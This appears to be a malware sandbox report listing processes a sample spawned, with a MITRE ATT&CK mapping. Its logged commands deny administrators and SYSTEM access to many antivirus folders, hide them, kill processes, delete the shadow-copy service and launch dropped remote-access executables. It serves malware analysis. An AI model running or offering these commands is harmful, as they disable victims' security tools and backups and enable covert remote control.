C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4616

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)

PID:4932

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:3980

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)

PID:5052

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)

PID:5644

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)

PID:4168

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)

PID:5144

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)

PID:5556

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:3892

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)

PID:5420

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5956

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)

PID:5940

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)

PID:6048

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)

PID:5780

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5688

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:5684

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:5992

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:5824

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:2652

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:5528

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)

PID:5852

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)

PID:5740

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:6044

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)

PID:1780

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)

PID:5500

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)

PID:5508

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)

PID:5600

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:1880

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:4376

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:2544

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:5188

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)

PID:5192

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5176

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

PID:5280

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

PID:5648

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:5212

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:5252

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:5748

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:5028

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:6028

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

PID:1200

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:5664

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:6056

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)

PID:6116

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)

PID:3676

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)

PID:5860

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)

PID:5844

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)

PID:5960

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5984

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)

PID:5364

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:6096

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)

PID:4804

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:2256

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)

PID:5128

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)

Modifies file permissions

PID:5332

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)

PID:5288

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)

PID:3792

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)

PID:3492

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)

PID:5552

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

PID:2732

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

PID:2796

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)

PID:4560

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)

PID:5132

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

PID:188

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

PID:4468

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)

PID:5112

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)

PID:5612

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

Drops file in Drivers directory

PID:5584

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat

PID:5720

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5 /NOBREAK

Delays execution with timeout.exe

PID:5776

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3 /NOBREAK

Delays execution with timeout.exe

PID:5924

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM 1.exe /T /F

Kills process with taskkill

PID:5384

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM P.exe /T /F

Kills process with taskkill

PID:5440

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

Views/modifies file attributes

PID:5548

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat

PID:5996

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM iediagcmd.exe /T /F

Kills process with taskkill

PID:5944

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5388

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:6060

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:6100

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)

PID:5460

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\360\Total Security"

Drops file in Program Files directory
Views/modifies file attributes

PID:5480

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:6140

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\ProgramData\360TotalSecurity

Views/modifies file attributes

PID:5396

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\ProgramData\360safe

Views/modifies file attributes

PID:5516

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:2360

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5344

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\ProgramData\Avira

Views/modifies file attributes

PID:2784

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:5488

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Package Cache"

Views/modifies file attributes

PID:1452

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:2836

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\ESET"

Drops file in Program Files directory
Views/modifies file attributes

PID:5040

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:4176

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\ProgramData\ESET

Views/modifies file attributes

PID:5260

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:2704

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"

Drops file in Program Files directory
Views/modifies file attributes

PID:1636

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5076

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Programdata\AVAST Software"

Views/modifies file attributes

PID:5536

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5380

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Programdata\Kaspersky Lab"

Views/modifies file attributes

PID:5732

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"

Views/modifies file attributes

PID:1264

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:816

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:5756

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\AdwCleaner"

Views/modifies file attributes

PID:1688

C:\Windows\SysWOW64\icacls.exe

icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:1368

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"

Drops file in Program Files directory
Views/modifies file attributes

PID:5672

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:3956

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "c:\programdata\Malwarebytes"

Views/modifies file attributes

PID:1444

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5936

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Programdata\MB3Install"

Views/modifies file attributes

PID:5820

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:5808

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\KVRT_Data"

Views/modifies file attributes

PID:2052

C:\Windows\SysWOW64\icacls.exe

icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:5416

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Norton"

Views/modifies file attributes

PID:5220

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:2964

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Avg"

Views/modifies file attributes

PID:5352

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:5544

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\grizzly"

Views/modifies file attributes

PID:5168

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5540

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Doctor Web"

Views/modifies file attributes

PID:5164

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:1056

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Indus"

Views/modifies file attributes

PID:1156

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5244

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\WINDOWS\McMwt"

Drops file in Windows directory
Views/modifies file attributes

PID:5564

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:5272

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:5768

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:3420

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)

PID:5788

C:\Windows\SysWOW64\timeout.exe

timeout 1

Delays execution with timeout.exe

PID:5596

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

Modifies file permissions

PID:1764

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)

PID:6120

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

PID:6036

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)

PID:3020

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"

Views/modifies file attributes

PID:1124

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Microsoft\Check"

Views/modifies file attributes

PID:5432

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"

Views/modifies file attributes

PID:5492

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

PID:3372

C:\Windows\SysWOW64\sc.exe

sc delete swprv

PID:3280

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:2276

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

Executes dropped EXE

PID:2272

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

Executes dropped EXE

PID:2072

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

Executes dropped EXE
Suspicious behavior: SetClipboardViewer

PID:372

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

Checks SCSI registry key(s)
Modifies data under HKEY_USERS

PID:3508

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s TermService

PID:3764

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

Loads dropped DLL

PID:4664

Network

MITRE ATT&CK Matrix

Collection

Data from Local System

T1005

Command and Control

Credential Access

Credentials in Files

T1081

Defense Evasion

Disabling Security Tools

T1089

Web Service

T1102

Modify Registry

T1112

Hidden Files and Directories

T1158

File Permissions Modification

T1222

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Execution

Command-Line Interface

T1059